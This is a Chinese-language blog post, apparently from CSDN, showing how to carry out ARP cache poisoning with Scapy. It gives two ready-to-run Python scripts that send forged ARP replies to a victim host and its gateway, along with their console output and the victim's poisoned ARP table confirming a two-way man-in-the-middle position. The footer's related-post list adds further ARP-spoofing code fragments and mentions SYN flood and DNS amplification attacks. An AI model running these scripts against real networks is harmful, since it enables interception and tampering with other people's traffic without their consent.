scapy实现arp 毒化攻击

最新推荐文章于 2024-02-07 07:17:15 发布
最新推荐文章于 2024-02-07 07:17:15 发布
阅读量2.6k 收藏 3
点赞数
分类专栏: Network Security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ivnetware/article/details/51288532
版权

攻击者IP    :192.168.0.112        MAC:00:0c:29:ab:27:ff

被攻击者IP:192.168.0.104        MAC:00:23:14:ad:36:c0

网关IP        :192.168.0.1             MAC:9c:21:6a:4f:cc:38 


脚本文件a.py

欺骗 192.168.0.104主机告诉其网关MAC地址为攻击者

#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='00:23:14:ad:36:c0',psrc='192.168.0.1',pdst='192.168.0.104'))

脚本文件b.py

欺骗 网关192.168.0.1主机告诉192.168.0.104 MAC地址为攻击者MAC

#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='9c:21:6a:4f:cc:38',psrc='192.168.0.104',pdst='192.168.0.1'))

分别执行两个脚本: 

root@kali:/dd/shell# python a.py 
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding




root@kali:/dd/shell# python b.py 
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding


此时被攻击者的arp表将会出现如下现,此时可看到arp表项网关192.168.0.1的mac地址和攻击者192.168.0.112的mac地址一样。可知欺骗成功。

C:\Users\Administrator>arp -a

接口: 192.168.0.104 --- 0xd
  Internet 地址         物理地址              类型
  192.168.0.1           00-0c-29-ab-27-ff     动态
  192.168.0.80          00-14-6a-89-69-80     动态
  192.168.0.100         5c-f9-38-39-9c-73     动态
  192.168.0.112         00-0c-29-ab-27-f      动态
  192.168.0.113         b8-27-eb-5d-b5-63     动态
  192.168.0.210         84-2b-2b-b7-67-de     动态
  192.168.0.230         00-25-b3-0b-a1-49     动态
  192.168.0.255         ff-ff-ff-ff-ff-ff     静态
  224.0.0.2             01-00-5e-00-00-02     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态


再看下网关的arp表项,192.168.0.112和192.168.0.104的mac地址一样,可知欺骗成功。




至此,攻击者双向欺骗成功。

ivnetware
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python黑帽子:利用scapy进行arp缓存投毒
samohyes的博客
08-05 2978
from scapy.all import * import os import sys import threading import signal #interface = 'en1' target_ip = '192.168.43.141' gateway_ip = '192.168.43.1' packet_count = 1000 def restore_target(gatewa
利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测
最新发布
m0_60635224的博客
04-09 981
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
[转]中间人攻击-ARP毒化
weixin_30840253的博客
04-27 184
原文地址:http://www.freebuf.com/articles/system/5157.html 中间人攻击虽然古老,但仍处于受到黑客攻击的危险中,可能会严重导致危害 服务器和用户。仍然有很多变种的中间人攻击是有效的,它们能够很容易的欺骗外行并且入侵他们。正如字面意思一样,中间人攻击就是攻击者扮演中间人并且实施 攻击。它有时被称为monkey-in-the-middle攻击更先进的说它...
ARP毒化攻击
刘启明
04-08 2059
ARP欺骗(毒化) 上面提到过了ARP缓存表,在每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。 假设主机 A 192.168.1.2,B 192.168.1.3,C 192.168.1.4; 网关 G 192.168.1.1; 在同一局域网,主机A和B通过网关G相互通信,就好比A和B两个人写信,由邮递员G送信,C永远都不会知道A和B...
中间人攻击-ARP毒化
hljzzj的博客
10-12 914
中间人攻击虽然古老,但仍处于受到黑客攻击的危险中,可能会严重导致危害服务器和用户。仍然有很多变种的中间人攻击是有效的,它们能够很容易的欺骗外行并且入侵他们。正如字面意思一样,中间人攻击就是攻击者扮演中间人并且实施攻击。它有时被称为monkey-in-the-middle攻击更先进的说它是man-in-the-browser攻击和man-in-the-mobile攻击。 这其实是一个危险的攻击,它
scapy-MITM:使用Scapy进行ARP毒化的小型python脚本,并使用iptables进行IPTM重定向以进行MITM攻击。 用于https
05-02
替补使用Scapy的小型python脚本使用Linux内置的Iptables进行ARP中毒和IP地址重定向,以执行MITM攻击。 目前,它的测试很有限,这意味着当心它不起作用。 另外,这会弄乱您的Iptable配置的规则,因此,如果您关心这种...
Python利用scapy实现ARP欺骗的方法
01-20
本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether...
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 这里就直接用python的scapy搞。 这里是arp攻击方式,你可以做成arp攻击。 复制...
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
ARP毒化
m0_62207482的博客
02-07 774
而在TCP/IP中,网络层只关注目标主机的IP地 址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层 的IP协议提供的数据中,只包含目的主机的IP地址,于是需要ARP来完成IP地址 到MAC地址的转换。ARP带来便利的同时也存在着一个重大缺陷:ARP是建立在网络中各个主机 互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而 直接将报文中的IP和MAC记入其ARP缓存表。2)如果有,则进行通信。通过对比可以看到,网关的MAC地址跟Kali的MAC地址是一样的。
网络-ARP协议详解与ARP欺骗(中毒)攻击实战
关注网络安全、云原生安全
12-02 3963
简介 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址(MAC地址)的一个协议。划分到网络层或数据链路层,用在局域网内。 功能:完成主机或路由器IP地址到MAC地址的映射。 过程:检查ARP高速缓存,有对应表项则写入MAC帧,没有则用目的MAC地址为FF-FF FF-FF-FF-FF的帧封装并广播ARP请求分组,同一局域网中所有主机都能收到该请求。目的主机收到请求后就会向源主机单播一个ARP响应分组,源主机收到后将此映射写入ARP缓存(10-
Scapy,IPTables,Brupsuite在ARP毒化攻击中的实用性技巧
wang_walfred的专栏
10-15 1481
ARP毒化攻击是一种比较老的攻击技术,是中间人攻击的一种途径。传统的攻击方法重点在于信息的收集(密码,Cookie,CSRF令牌等等任何信息)。有时这种攻击也用来对付通过SSL协议访问的目标。但是其中一个攻击途径我认为没有引起足够的重视,就是让中间人作为一个活跃的攻击点去攻击在各类Web应用。关于这种技术大部分的内容都能在网络上找到,但是使用的例子我认为都是零散的也不够完整。
黑客-ubuntu下scapyARP攻击(1)
猪也fine的博客
06-28 2308
实现目标,利用arp响应,让处于同一局域网内的主机无法上网 首先下载scapy:sudo apt-get install python-scapy然后输入sudo scapy如果出现 说明安装成功,接下来就可以开始攻击了 先重开一个终端,输入arp -a 其中网关ip是192.168.1.1 mac地址是a8:57:4e:32:02:ba; 要攻击的主机ip是192.168.1.108 m
黑客-ubuntu下的scapyARP攻击(2)
猪也fine的博客
07-03 4271
前一篇文章介绍了如何攻击局域网内主机,让它无法上网http://blog.csdn.net/qq_35315699/article/details/73863632 具体语言是python,有c/c++语言基础的很快就能掌握接下来我们来实现让被攻击主机依旧能上网,但数据包要从攻击者主机转发到路由器,这样我们就能获得被攻击者的所有数据包了A机为被攻击主机 i
17.ARP协议(工作过程、毒化过程与原理、防御方法)
✍千里之行,始于足下 ^,^
09-02 824
16. 什么是ARP? 地址解析协议 是根据IP地址获取MAC地址的TCP/IP协议 工作过程 主机A的IP地址为192.168.1.1,MAC地址为0A-11-22-33-44-01; 主机B的IP地址为192.168.1.2,MAC地址为0A-11-22-33-44-02; 当主机A要与主机B通信时,地址解析协议可以将主机B的IP地址(192.168.1.2)解析成主机B的MAC地址,以下...
Scapy交互式arp扫描与攻击
qq_37719766的博客
03-17 459
1、局域网Arp扫描:1)  简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)>>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))Beginemission:***Finishedto...
ARP协议及局域网断网攻击scapy
qq_43140627的博客
11-22 1658
ARP协议攻击 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主...
五类ARPARP毒化
小吴同学
06-23 571
一、概念 ARP(Address Resolution Protocol)地址解析协议,因为以太网中能唯一标识网络设备的是MAC地址,不是IP地址,所以网络设备之间通讯是需要识别MAC地址的,我们就需要将发出的目标IP地址转换成MAC地址来准确通讯,ARP协议帮我们实现了。 二、五类ARP 1、普通ARP:就是ARP,即IP地址转MAC地址 2、反向ARP:RARP,顾名思义将MAC地址转IP地址 RARP是主机向服务器IP地址的过程 ...
scapy ARP攻击
08-14
要进行ARP攻击,你可以使用Scapy来构建和发送ARP欺骗数据包。 下面是一个使用Scapy进行ARP欺骗攻击的示例代码: ```python from scapy.all import * def arp_spoof(target_ip, spoof_ip): target_mac = get_mac...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值